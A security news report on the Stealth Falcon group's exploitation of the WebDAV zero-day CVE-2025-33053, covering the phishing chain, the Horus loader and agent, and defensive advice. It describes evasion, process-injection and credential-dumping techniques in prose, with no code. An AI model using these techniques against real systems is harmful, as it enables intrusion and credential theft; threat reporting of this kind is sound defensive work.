The Egyptian god with a falcon’s head now lives in your Edge — but this is no mythology, it’s a new 0day.
PDF is not to blame — it’s just been possessed by a demon from a WebDAV server.
In the June Microsoft update, a critical zero-day vulnerability numbered CVE-2025-33053 was patched. This vulnerability had been actively exploited by the Stealth Falcon APT group to execute remote code on Windows systems. The vulnerability allowed attackers to change the working directory of system utilities and run malicious executables from WebDAV servers. According to Check Point, the attack was first detected in March 2025 during an attempt to compromise a Turkish defense company.
The infection chain started with a phishing email attachment — a malicious file with a .url extension, disguised as a PDF document. When opened, the object named “TLM.005_TELESKOPIK_MAST_HASAR_BILDIRIM_RAPORU.pdf.url” triggered the launch of “iediagcmd.exe,” a Windows built-in utility, but not from the local disk — instead, from an external WebDAV server where a trojan “route.exe” with the same name resided. This bypass of trusted paths was achieved through a working directory manipulation, allowing the malicious file to take priority over the legitimate one.
Experts note that this is the first known case of exploiting a WebDAV server by launching an executable file using native Windows tools rather than scripts or loaders. This finding highlights the innovative tactics of Stealth Falcon, also known as FruityArmor — a group active since 2012 and specialized in attacks on government and defense entities in the Middle East and Africa.
As part of this campaign, a new malware platform called Horus Agent was deployed, built on the Mythic C2 framework and named after the Egyptian god with a falcon’s head. Its initial stage was Horus Loader — a C++ loader protected through Code Virtualizer, capable of evading analysis by manually mapping “kernel32.dll” and “ntdll.dll” libraries. It checked for the presence of 109 antivirus processes from 17 vendors and masked its activity by decrypting and displaying a fake PDF document to distract the victim.
The loader used a technique called IPfuscation — encrypting the payload inside IPv6 addresses — and injected it into the Microsoft Edge browser process via system calls ZwAllocateVirtualMemory, ZwWriteVirtualMemory, and NtResumeThread. The final stage was the Horus Agent itself — a module with a deep level of obfuscation (OLLVM obfuscation, string encryption with a shift of -39, control flow flattening, and API hashing). The agent communicated with C2 servers over HTTP using AES encryption and HMAC-SHA256 signature, supported up to four domains, and included a kill switch with a date set to December 31, 2099.
Among its supported commands were system information gathering (survey) and shellcode injection (shinjectchunked). The group also deployed additional tools, including:
- Spayload — another Mythic module with extended capabilities;
- DC Credential Dumper — a tool for extracting NTDS.dit, SAM, and SYSTEM files by mounting a virtual disk “C:\ProgramData\ds_notifier_0.vhdx” and then compressing the data into a ZIP archive;
- Passive Backdoor (“usrprofscc.exe”) — a background service with administrative privileges waiting for shellcode in encrypted form;
- Keylogger (“StatusReport.dll”) — a module injected into “dxdiag.exe” that recorded keystrokes into an RC4-encrypted log at “C:\Windows\Temp~TN%LogName%.tmp.”
Microsoft fixed CVE-2025-33053 in the June Patch Tuesday update. Check Point experts recommend immediately updating Windows and implementing additional measures: raising employee awareness of phishing, monitoring network traffic, especially traffic related to WebDAV and suspicious domains, and using security solutions to detect attempts to bypass system utilities and inject code.
Stealth Falcon’s activity underscores the high technical proficiency of the attackers and their ability to adapt to the latest security mechanisms. The focus of these attacks remains on government entities and companies with critical infrastructure, especially in the Middle East, requiring organizations to maintain continuous monitoring and prompt response.
